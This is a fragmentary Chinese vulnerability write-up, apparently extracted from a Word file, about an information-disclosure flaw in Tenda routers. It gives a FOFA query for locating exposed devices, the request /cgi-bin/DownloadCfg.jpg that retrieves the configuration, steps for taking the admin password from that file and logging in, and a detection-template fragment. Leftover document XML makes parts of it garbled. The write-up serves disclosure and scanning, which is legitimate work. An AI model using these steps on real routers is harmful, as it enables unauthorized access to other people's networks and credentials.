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Tenda 路由器 DownloadCfg 信息泄露漏洞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Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞，攻击者通过构造特殊 URL 地址，读取系统敏感信息网访问该系统。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title="Tenda | LOGIN"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175" cy="2411095"/>
            <wp:effectExtent l="0" t="0" r="1206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3505" cy="2543810"/>
            <wp:effectExtent l="0" t="0" r="13335" b="12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/cgi-bin/DownloadCfg.jpg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4、从配置中查找账户密码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(直接打开JPG就行了)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6495" cy="2569210"/>
            <wp:effectExtent l="0" t="0" r="6985" b="635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5、成功登录如下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5275" cy="2637790"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1397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tenda-router-downloadcfg-infolink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name: Tenda 路由器 DownloadCfg 信息泄露漏洞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description: Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞，攻击者通过构造特殊 URL 地址，读取系统敏感信息网访问该系统。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reference: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- https://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metadata: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fofa-query: title="Tenda | LOGIN"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verified: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max-request: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GET  /cgi-bin/DownloadCfg.jpg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dsl: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contains_all(body,"Please")'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2A651"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F322A6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60317A8"/>
    <w:rsid w:val="11CE095F"/>
    <w:rsid w:val="1BDB7245"/>
    <w:rsid w:val="29763EBB"/>
    <w:rsid w:val="363216A2"/>
    <w:rsid w:val="3D341B53"/>
    <w:rsid w:val="4B515C3A"/>
    <w:rsid w:val="773D42D1"/>
    <w:rsid w:val="7BD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2023-11-30T13:40:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-30T14:40:10Z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4C12E78FBAF34D318B9D280272F12505_12</vt:lpwstr>
  </property>
</Properties>
</file>